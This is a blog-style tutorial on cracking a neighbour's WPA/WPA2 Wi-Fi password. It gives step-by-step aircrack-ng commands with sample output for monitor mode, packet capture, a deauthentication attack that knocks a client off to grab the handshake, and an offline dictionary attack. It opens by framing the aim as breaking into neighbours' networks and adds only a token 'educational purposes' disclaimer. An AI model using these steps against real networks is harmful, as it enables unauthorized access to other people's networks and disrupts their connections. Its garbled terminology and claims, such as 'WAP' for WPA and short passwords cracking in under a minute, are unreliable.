Now
days, we find our neighbor Wi-Fi network but when we try to
connect it say to enter password. They are put password in form of WEP or WPA/WPA2.
Here is some trick to hack or Crack the wireless/Wi-Fi password
using aircrack-ng.
In my
previous article I saw you to How to crack Wi-Fi or wireless password using
Backtrack.
Hacking wireless Wi-Fi passwords
The most common type of wireless security are Wired
Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).WEP was the original
encryption standards for wireless so that wireless networks can be secured as wired
network. There are several open source Utilities like aircrack-ng, weplab, wepcrack,
or airsnort that can be used by crackers to break in by examining packets and
looking for patterns in the encryption. WEP comes in different key sizes. The
common key lengths are currently 128- and 256-bit in WEP. Latter WAP and WAP2 were
introduced to overcome the problems of WEP. WAP was based on security protocol
802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases
makes WPA virtually uncrack able however if a small password is used of less
than 14 words it can be cracked in less than one minute by aircrack-ng, mostly
uses passwords of less than 14 words so use aircrack-ng for hacking .
Securing Wireless Network
The first step of securing wireless connection is
simply using long random passwords at least of
14 characters. Now if your Wi-Fi device supports for
WPA2 than use it, as many users don’t know that
Their device supports for many security encryption
techniques. Check your router security
techniques supported which is in its configuration page.
If you don’t know how to edit routers setting than
just open your browser and type 192.168.1.1 in
Address bar and here you will get your routers
configuration, where you can select.
Cracking Wireless Network
As we have read above this is an easy task, we just
have to use our network card in monitor mode so As to capture packets from
target network. And this NIC mode is driver dependent and network can be
monitored using aircrack-ng. But only small number if cards support this mode
under windows.
But you can use live CD of any linux OS (commonly backtrack)
or install linux OS as virtual machine.
List of compatible cards.
Now download aircrack-ng
for Linux or windows platform search on Google you can get it there. The
aircrack-ng suite is a collection of command-line programs aimed at WEP and
WPA-PSK key Cracking. The ones we will be using are:
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
Using aircrack-ng
First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point, you have 2 options : either wait until a client connects and the 4-way handshake is
complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s
force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Stop airodump-ng and make sure the files were created properly
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Form this point forward; you do not need to be anywhere
nears the wireless network. All cracking will happen offline, so you can stop air
dump and other processes and even walk away from the AP. In fact,
I would suggest walking away and finding yourself a
cosy place where you can live, eat, sleep, etc.
Cracking a WPA2 PSK key is based on bruteforcing,
and it can take a very very long time.
There are 2 ways of bruteforcing : one that is
relatively fast but does not guarantee success and one That is very slow, but
guarantees that you will find the key at some point in time.
The first option is by using a worklist/drstionary
file. A lot of these files can be found
on the internet (e.g.www.theargon.com or on packetstorm (see the archives)), or
can be generated with tools such
as John The Ripper. Once the wordlist is created,
all you need to do is run aircrack-ng with the
worklist and feed it the .cap fie that contains the
WPA2 Handshake.
So if your wordlist is called word.lst (under
/tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7
/tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly
linked to the strength of your password file. In other words, you may get lucky
and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull
for sure, but it may take ages to complete.
Keep in mind, a WPA2 key can be up to 64 characters,
so in theory you would to build every
Password combination with all possible character
sets and feed them into aircrack.
Hope you enjoy(-_-) this post.!
Note: This tutorial is only for Educational
Purposes.
Thanx for http://hackerzpositive.blogspot.in/
ReplyDelete